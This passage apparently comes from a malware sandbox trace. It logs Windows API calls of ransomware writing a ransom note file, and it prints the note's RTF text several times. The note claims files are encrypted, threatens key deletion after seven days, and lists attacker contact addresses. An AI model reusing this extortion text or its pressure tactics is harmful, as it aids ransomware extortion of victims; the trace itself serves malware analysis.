n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nEwJVUzEVMBMGA1UEChMMRGl\x93/", lpUsedDefaultChar=0x0) returned 8717 [0298.808] WriteFile (in: hFile=0x27c, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.809] CloseHandle (hObject=0x27c) returned 1 [0298.809] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hu\\#readme_eman#.rtf")) returned 0xffffffff [0298.809] GetLastError () returned 0x2 [0298.809] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hu\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.810] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.810] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 